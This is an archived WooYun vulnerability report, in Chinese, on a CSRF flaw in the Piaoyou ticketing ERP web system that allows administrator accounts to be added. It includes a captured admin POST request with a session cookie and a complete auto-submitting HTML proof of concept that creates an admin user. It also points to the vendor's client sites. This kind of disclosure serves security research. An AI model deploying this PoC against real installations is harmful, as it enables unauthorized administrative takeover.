当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101168

漏洞标题:票友ERP管理系统网页版存在csrf添加管理员账户漏洞

相关厂商:票友软件

漏洞作者: 泳少

提交时间:2015-03-16 17:00

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看见待认领那边………………然后社工下了客服拿到网页地址
票友软件致力于票务行业代理人和广大业务部提供基于Internet的各项专业基础服务和增值服务,在IT领域,为计算机、网络、信息客户提供软件平台解决方案的专业信息科技公司,重点从事互联网业务。
秉承用户需求至上的宗旨,立足于技术为本、兼收并蓄,博采众长的原则,票友软件凭借雄厚的技术开发实力,已经从纯粹的技术服务商成长为Internet服务器端软件及完整解决方案的提供商。长期以来,为了有效地提高网络集成和系统平台建设的服务品质和竞争力,围绕网络服务业,我公司在包括NT、Linux平台上做了大量的软件开发工作,几乎涵盖了一般商业企业互联网公司应用的主要方面。已经开发了大量的商业软件。这些应用系统对网络服务业务起到了有效的支持作用。同时,也为企业用户提供了更广阔的市场前景,更强大的营销力度和网站推广手段。
全方位的技术支持服务,为您24小时提供电话、邮件、在线交流等咨询及售后服务!专业技术人员贯通售前、售中、售后各个环节的服务实施和衔接;对本地客户实施隔天预约免费上门服务,异地客户实施电话、远程控制、在线交流等多种服务方式,建立规范的客户信息资料,对服务记录、服务监督与投诉等过程进行有效跟踪管理。

详细说明:

1.png

2.png

3.png


然后进入后台后。看见能够添加管理员

4.png


打开burp抓下包看看是怎么样带入数据库的

5.png


POST /Ajax/users.ashx HTTP/1.1
Host: demo.piaoyou.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://demo.piaoyou.org/System/user_set.aspx
Content-Length: 194
Cookie: ASP.NET_SessionId=qngxhf3hwkgpf0bsehu2k4li; pycookie=loginname=admin&truename=%e7%b3%bb%e7%bb%9f%e7%ae%a1%e7%90%86%e5%91%98&flag=1&datagroup=&kefugroup=%e7%bd%91%e7%bb%9c%e9%83%a8&kpgroup=0&kpdian=none%7c%e5%a4%a9%e5%9c%b0%e8%a1%8c%7c%e4%b8%8d%e5%a4%9c%e5%9f%8e%7c%e4%bb%8a%e6%97%a5%e5%a4%a9%e4%b8%8b%e9%80%9a%7c%e5%8d%97%e8%88%aa%e7%bd%91%e7%ab%99%7c%e5%9b%bd%e8%88%aa%7c%e7%bd%91%e7%bb%9c%e8%ae%a2%e5%8d%95%7c%e4%bb%8a%e6%97%a5%e5%a4%a9%e4%b8%8b%e9%80%9a123%7c
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
fs=0&id=0&roles=52&username=test1&yusername=&pwd=123456&truename=%E6%B5%8B%E8%AF%952&sex=%E7%94%B7&age=1900-1-1&mob=&hk=&sfz=&zw=&kefugroup=%E9%94%80%E5%94%AE%E9%83%A8&week=1,2,3,4,5,6,0,&times=


把它post进去。下面提供下poc

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "187","78" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);
}
function fireForms()
{
var count = 2;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();

pausecomp(pauses[i]);
}
}

</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://demo.piaoyou.org:80/Ajax/users.ashx">
<input type="hidden" name="fs" value="0"/>
<input type="hidden" name="id" value="0"/>
<input type="hidden" name="roles" value="52"/>
<input type="hidden" name="username" value="test"/>
<input type="hidden" name="yusername" value=""/>
<input type="hidden" name="pwd" value="123456"/>
<input type="hidden" name="truename" value="测试"/>
<input type="hidden" name="sex" value="男"/>
<input type="hidden" name="age" value="1900-1-1"/>
<input type="hidden" name="mob" value=""/>
<input type="hidden" name="hk" value=""/>
<input type="hidden" name="sfz" value=""/>
<input type="hidden" name="zw" value=""/>
<input type="hidden" name="kefugroup" value="销售部"/>
<input type="hidden" name="week" value="1,2,3,4,5,6,0,"/>
<input type="hidden" name="times" value=""/>
</form>
<form method="POST" name="form1" action="http://demo.piaoyou.org:80/Ajax/kefu_check.ashx">
<input type="hidden" name="name" value="value"/>
</form>
</body>
</html>


打开后…………

6.png


7.png


漏洞证明:

6.png


7.png

修复方案:

加强验证。旗下客户网站看看有没有这个错误。
http://piaoyou.org/case_web.htm这里是客户网站。得注意啊

版权声明:转载请注明来源 泳少@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝